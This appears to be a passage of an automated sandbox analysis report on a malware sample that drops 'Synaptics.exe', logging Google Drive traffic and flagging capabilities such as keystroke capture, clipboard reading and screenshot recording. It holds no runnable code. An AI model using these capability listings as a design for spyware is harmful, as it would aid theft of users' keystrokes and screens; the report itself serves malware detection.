Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked

Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: *.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)

Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_0043C1FC GetKeyboardState,

6_2_0043C1FC

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Code function: 7_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

7_2_00405809

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

6_2_004289FC

Contains functionality to record screenshots

Source: C:\ProgramData\Synaptics\Synaptics.exe

Code function: 12_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

12_2_00429040

One or more processes crash

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004601F0	6_2_004601F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046C7CC	6_2_0046C7CC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048C7F4	6_2_0048C7F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044EA40	6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00496E18	6_2_00496E18
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046B1E4	6_2_0046B1E4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045FCC8	6_2_0045FCC8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00453DA4	6_2_00453DA4
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00406D5F	7_2_00406D5F
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_687E1BFF	7_2_687E1BFF
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004601F0	9_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0046C7CC	9_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0048C7F4	9_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044EA40	9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00496E18	9_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0046B1E4	9_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045FCC8	9_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00453DA4	9_2_00453DA4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004601F0	12_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0046C7CC	12_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0048C7F4	12_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044EA40	12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00496E18	12_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0046B1E4	12_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045FCC8	12_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00453DA4	12_2_00453DA4

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ._cache_uniformerede.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXCD96.tmp.6.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: YC9w8Aif.exe.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ~$cache1.9.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Section loaded: starttiledata.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Section loaded: starttiledata.dll			Jump to behavior

Uses 32bit PE files

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

7_2_00403640

Found potential string decryption / allocating functions

Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00406CDC appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004049E4 appears 40 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 0049058C appears 112 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00404A58 appears 34 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004109E8 appears 68 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004049C0 appears 117 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004865B4 appears 38 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00486788 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004070F0 appears 168 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00404CCC appears 108 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 004967D4 appears 36 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 00403F78 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: String function: 0040F7A4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 0049058C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004109E8 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004049C0 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 004070F0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: String function: 00404CCC appears 54 times

Contains functionality to call native functions

